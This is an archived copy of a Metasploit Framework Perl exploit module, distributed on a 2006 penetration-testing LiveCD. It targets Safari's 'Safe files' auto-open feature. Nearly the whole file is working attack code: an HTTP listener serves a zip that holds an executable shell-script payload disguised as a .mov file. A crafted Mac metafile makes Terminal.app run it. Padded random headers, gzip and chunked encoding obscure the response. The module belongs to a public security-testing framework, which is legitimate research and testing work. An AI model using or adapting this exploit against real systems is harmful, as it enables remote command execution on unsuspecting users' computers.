home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / safari_safefiles_exec.pm < prev    next >
Encoding:
Perl POD Document  |  2006-06-30  |  12.8 KB  |  394 lines
  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::safari_safefiles_exec;
  11.  
  12. use strict;
  13. use base "Msf::Exploit";
  14. use Pex::Text;
  15. use IO::Socket::INET;
  16. use IPC::Open3;
  17. use FindBin qw{$RealBin};
  18.  
  19.  my $advanced =
  20.   {
  21.     'Gzip'       => [1, 'Enable gzip content encoding'],
  22.     'Chunked'    => [1, 'Enable chunked transfer encoding'],
  23.   };
  24.  
  25. my $info =
  26.   {
  27.     'Name'           => 'Safari Archive Metadata Command Execution',
  28.     'Version'        => '$Revision: 1.3 $',
  29.     'Authors'        =>
  30.       [
  31.         'H D Moore <hdm [at] metasploit.com',
  32.       ],
  33.  
  34.     'Description'    =>
  35.       Pex::Text::Freeform(qq{
  36.         This module exploits a vulnerability in Safari's "Safe file" feature, which will
  37.         automatically open any file with one of the allowed extensions. This can be abused
  38.         by supplying a zip file, containing a shell script, with a metafile indicating
  39.         that the file should be opened by Terminal.app. This module depends on
  40.         the 'zip' command-line utility.
  41. }),
  42.  
  43.     'Arch'           => [  ],
  44.     'OS'             => [  ],
  45.     'Priv'           => 0,
  46.  
  47.     'UserOpts'       =>
  48.       {
  49.         'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
  50.         'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
  51.           'REALHOST' => [ 0, 'HOST', 'External address to use for redirects (NAT)' ],
  52.       },
  53.  
  54.     'Payload'        =>
  55.       {
  56.         'Space'     => 8000,
  57.         'MinNops'   => 0,
  58.         'MaxNops'   => 0,
  59.         'Keys'     => ['cmd', 'cmd_bash'],
  60.       },
  61.     'Refs'           =>
  62.       [
  63.         ['URL', 'http://www.heise.de/english/newsticker/news/69862'],
  64.         ['BID', '16736'],
  65.       ],
  66.  
  67.     'DefaultTarget'  => 0,
  68.     'Targets'        =>
  69.       [
  70.         [ 'Automatic' ]
  71.       ],
  72.  
  73.     'Keys'           => [ 'safari' ],
  74.  
  75.     'DisclosureDate' => 'Feb 21 2006',
  76.   };
  77.  
  78. sub new {
  79.     my $class = shift;
  80.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  81.     return($self);
  82. }
  83.  
  84. sub Exploit
  85. {
  86.     my $self = shift;
  87.     my $server = IO::Socket::INET->new(
  88.         LocalHost => $self->GetVar('HTTPHOST'),
  89.         LocalPort => $self->GetVar('HTTPPORT'),
  90.         ReuseAddr => 1,
  91.         Listen    => 1,
  92.         Proto     => 'tcp'
  93.       );
  94.     my $client;
  95.  
  96.     # Did the listener create fail?
  97.     if (not defined($server)) {
  98.         $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
  99.         return;
  100.     }
  101.  
  102.     my $httphost = $self->GetVar('HTTPHOST');
  103.     $httphost = Pex::Utils::SourceIP('1.2.3.4') if $httphost eq '0.0.0.0';
  104.  
  105.     $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
  106.  
  107.     while (defined($client = $server->accept())) {
  108.         $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
  109.     }
  110.  
  111.     return;
  112. }
  113.  
  114. sub HandleHttpClient
  115. {
  116.     my $self = shift;
  117.     my $fd   = shift;
  118.  
  119.     # Set the remote host information
  120.     my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
  121.         
  122.  
  123.     # Read the HTTP command
  124.     my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
  125.     my $agent;
  126.     
  127.     # Read in the HTTP headers
  128.     while ((my $line = $fd->RecvLine(10))) {
  129.         
  130.         $line =~ s/^\s+|\s+$//g;
  131.         
  132.         my ($var, $val) = split(/\:/, $line, 2);
  133.  
  134.         # Break out if we reach the end of the headers
  135.         last if (not defined($var) or not defined($val));
  136.  
  137.         $agent = $val if $var =~ /User-Agent/i;
  138.     }
  139.  
  140.     my $target    = $self->Targets->[$self->GetVar('TARGET')];
  141.     my $shellcode = $self->GetVar('EncodedPayload')->RawPayload;
  142.     my $content   = $self->CreateZip($shellcode) || return;
  143.     
  144.     $self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload...");
  145.  
  146.     $fd->Send($self->BuildResponse($content));
  147.  
  148.     select(undef, undef, undef, 0.1);
  149.  
  150.     $fd->Close();
  151. }
  152.  
  153. sub RandomHeaders {
  154.     my $self = shift;
  155.     my $head = '';
  156.  
  157.     while (length($head) < 3072) {
  158.         $head .= "X-" .
  159.           Pex::Text::AlphaNumText(int(rand(30) + 5)) . ': ' .
  160.           Pex::Text::AlphaNumText(int(rand(256) + 5))  ."\r\n";
  161.     }
  162.     return $head;
  163. }
  164.  
  165.  
  166. sub BuildResponse {
  167.     my ($self, $content) = @_;
  168.  
  169.     my $response =
  170.       "HTTP/1.1 200 OK\r\n" .
  171.       $self->RandomHeaders() .
  172.       "Content-Type: application/zip\r\n";
  173.  
  174.     if ($self->GetVar('Gzip')) {
  175.         $response .= "Content-Encoding: gzip\r\n";
  176.         $content = $self->Gzip($content);
  177.     }
  178.     if ($self->GetVar('Chunked')) {
  179.         $response .= "Transfer-Encoding: chunked\r\n";
  180.         $content = $self->Chunk($content);
  181.     } else {
  182.         $response .= 'Content-Length: ' . length($content) . "\r\n" .
  183.           "Connection: close\r\n";
  184.     }
  185.  
  186.     $response .= "\r\n" . $content;
  187.  
  188.     return $response;
  189. }
  190.  
  191. sub Chunk {
  192.     my ($self, $content) = @_;
  193.  
  194.     my $chunked;
  195.     while (length($content)) {
  196.         my $chunk = substr($content, 0, int(rand(10) + 1), '');
  197.         $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
  198.     }
  199.     $chunked .= "0\r\n\r\n";
  200.  
  201.     return $chunked;
  202. }
  203.  
  204. sub Gzip {
  205.     my $self = shift;
  206.     my $data = shift;
  207.     my $comp = int(rand(5))+5;
  208.  
  209.     my($wtr, $rdr, $err);
  210.  
  211.     my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
  212.     print $wtr $data;
  213.     close ($wtr);
  214.     local $/;
  215.  
  216.     return (<$rdr>);
  217. }
  218.  
  219. # Lame!
  220. sub CreateZip {
  221.     my $self = shift;
  222.     my $cmds = shift;
  223.  
  224.     my $data = $cmds."\n";
  225.     my $name = Pex::Text::AlphaNumText(int(rand(10)+4)).".mov";    
  226.     my $temp = ($ENV{'HOME'} || $RealBin || "/tmp") . "/msf_safari_temp_".Pex::Text::AlphaNumText(16);
  227.     
  228.     if ($self->GotZip != 0) {
  229.         $self->PrintLine("[*] Could not execute the zip command (or zip returned an error)");
  230.         return;        
  231.     }
  232.     
  233.     if (! mkdir($temp,0755)) {
  234.         $self->PrintLine("[*] Could not create a temporary directory: $!");
  235.         return;
  236.     }
  237.     
  238.     if (! chdir($temp)) {
  239.         $self->PrintLine("[*] Could not change into temporary directory: $!");
  240.         $self->Nuke($temp);
  241.         return;
  242.     }
  243.     
  244.     if (! mkdir("$temp/__MACOSX",0755)) {
  245.         $self->PrintLine("[*] Could not create the MACOSX temporary directory: $!");
  246.         return $self->Nuke($temp);
  247.         return;
  248.     }
  249.     
  250.     if (! open(TMP, ">$temp/$name")) {
  251.         $self->PrintLine("[*] Could not create the shell script: $!");
  252.         $self->Nuke($temp);
  253.         return;
  254.     }
  255.     
  256.     print TMP $data;
  257.     close(TMP);
  258.     
  259.     # This is important :)
  260.     chmod(0755, "$temp/$name");
  261.     
  262.     
  263.     if (! open(TMP, ">$temp/__MACOSX/._".$name)) {
  264.         $self->PrintLine("[*] Could not create the metafile: $!");
  265.         $self->Nuke($temp);
  266.         return;
  267.     }
  268.     
  269.     print TMP $self->OSXMetaFile;
  270.     close(TMP);
  271.     
  272.     system("zip", "exploit.zip", $name, "__MACOSX/._".$name);
  273.     
  274.     
  275.     
  276.     if( ! open(TMP, "<"."exploit.zip")) {
  277.         $self->PrintLine("[*] Failed to create exploit.zip (weird zip command?)");
  278.         $self->Nuke($temp);
  279.         return;
  280.     }
  281.     
  282.     my $xzip;
  283.     while (<TMP>) { $xzip .= $_ }
  284.     close (TMP);
  285.     
  286.     $self->Nuke($temp);
  287.     return $xzip;
  288. }
  289.  
  290. sub Nuke {
  291.     my $self = shift;
  292.     my $temp = shift;
  293.     system("rm", "-rf", $temp);
  294.     return;
  295. }
  296.  
  297. sub GotZip {
  298.     return system("zip -h >/dev/null 2>&1");
  299. }
  300.  
  301. sub OSXMetaFile {
  302.     return 
  303.         "\x00\x05\x16\x07\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  304.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x09\x00\x00".
  305.         "\x00\x32\x00\x00\x00\x20\x00\x00\x00\x02\x00\x00\x00\x52\x00\x00".
  306.         "\x05\x3a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  307.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  308.         "\x00\x00\x00\x00\x01\x00\x00\x00\x05\x08\x00\x00\x04\x08\x00\x00".
  309.         "\x00\x32\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  310.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  311.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  312.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  313.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  314.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  315.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  316.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  317.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  318.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  319.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  320.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  321.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  322.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  323.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  324.         "\x00\x00\x00\x00\x04\x04\x00\x00\x00\x25\x2f\x41\x70\x70\x6c\x69".
  325.         "\x63\x61\x74\x69\x6f\x6e\x73\x2f\x55\x74\x69\x6c\x69\x74\x69\x65".
  326.         "\x73\x2f\x54\x65\x72\x6d\x69\x6e\x61\x6c\x2e\x61\x70\x70\x00\xec".
  327.         "\xec\xec\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec".
  328.         "\xec\xec\xff\xec\xec\xec\xff\xe1\xe1\xe1\xff\xe1\xe1\xe1\xff\xe1".
  329.         "\xe1\xe1\xff\xe1\xe1\xe1\xff\xe1\xe1\xe1\xff\xe1\xe1\xe1\xff\xe1".
  330.         "\xe1\xe1\xff\xe1\xe1\xe1\xff\xe6\xe6\xe6\xff\xe6\xe6\xe6\xff\xe6".
  331.         "\xe6\xe6\xff\xe6\xe6\xe6\xff\xe6\xe6\xe6\xff\xe6\xe6\xe6\xff\xe6".
  332.         "\xe6\xe6\xff\xe6\xe6\xe6\xff\xe9\xe9\xe9\xff\xe9\xe9\xe9\xff\xe9".
  333.         "\xe9\xe9\xff\xe9\xe9\xe9\xff\xe9\xe9\xe9\xff\xe9\xe9\xe9\xff\xe9".
  334.         "\xe9\xe9\xff\xe9\xe9\xe9\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec".
  335.         "\xec\xec\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec".
  336.         "\xec\xec\xff\xec\xec\xec\xff\xef\xef\xef\xff\xef\xef\xef\xff\xef".
  337.         "\xef\xef\xff\xef\xef\xef\xff\xef\xef\xef\xff\xef\xef\xef\xff\xef".
  338.         "\xef\xef\xff\xef\xef\xef\xff\xf3\xf3\xf3\xff\xf3\xf3\xf3\xff\xf3".
  339.         "\xf3\xf3\xff\xf3\xf3\xf3\xff\xf3\xf3\xf3\xff\xf3\xf3\xf3\xff\xf3".
  340.         "\xf3\xf3\xff\xf3\xf3\xf3\xff\xf6\xf6\xf6\xff\xf6\xf6\xf6\xff\xf6".
  341.         "\xf6\xf6\xff\xf6\xf6\xf6\xff\xf6\xf6\xf6\xff\xf6\xf6\xf6\xff\xf6".
  342.         "\xf6\xf6\xff\xf6\xf6\xf6\xff\xf8\xf8\xf8\xff\xf8\xf8\xf8\xff\xf8".
  343.         "\xf8\xf8\xff\xf8\xf8\xf8\xff\xf8\xf8\xf8\xff\xf8\xf8\xf8\xff\xf8".
  344.         "\xf8\xf8\xff\xf8\xf8\xf8\xff\xfc\xfc\xfc\xff\xfc\xfc\xfc\xff\xfc".
  345.         "\xfc\xfc\xff\xfc\xfc\xfc\xff\xfc\xfc\xfc\xff\xfc\xfc\xfc\xff\xfc".
  346.         "\xfc\xfc\xff\xfc\xfc\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
  347.         "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
  348.         "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
  349.         "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
  350.         "\xff\xff\xff\xff\xff\xff\xa8\x00\x00\x00\xa8\x00\x00\x00\xa8\x00".
  351.         "\x00\x00\xa8\x00\x00\x00\xa8\x00\x00\x00\xa8\x00\x00\x00\xa8\x00".
  352.         "\x00\x00\xa8\x00\x00\x00\x2a\x00\x00\x00\x2a\x00\x00\x00\x2a\x00".
  353.         "\x00\x00\x2a\x00\x00\x00\x2a\x00\x00\x00\x2a\x00\x00\x00\x2a\x00".
  354.         "\x00\x00\x2a\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00".
  355.         "\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00".
  356.         "\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  357.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  358.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  359.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  360.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  361.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  362.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  363.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  364.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  365.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  366.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  367.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  368.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  369.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  370.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  371.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  372.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  373.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  374.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  375.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  376.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  377.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  378.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  379.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  380.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  381.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  382.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  383.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  384.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  385.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  386.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  387.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  388.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
  389.         "\x05\x08\x00\x00\x04\x08\x00\x00\x00\x32\x00\x5f\xd0\xac\x12\xc2".
  390.         "\x00\x00\x00\x1c\x00\x32\x00\x00\x75\x73\x72\x6f\x00\x00\x00\x0a".
  391.         "\x00\x00\xff\xff\x00\x00\x00\x00\x01\x0d\x21\x7c";
  392. }
  393. 1;
  394.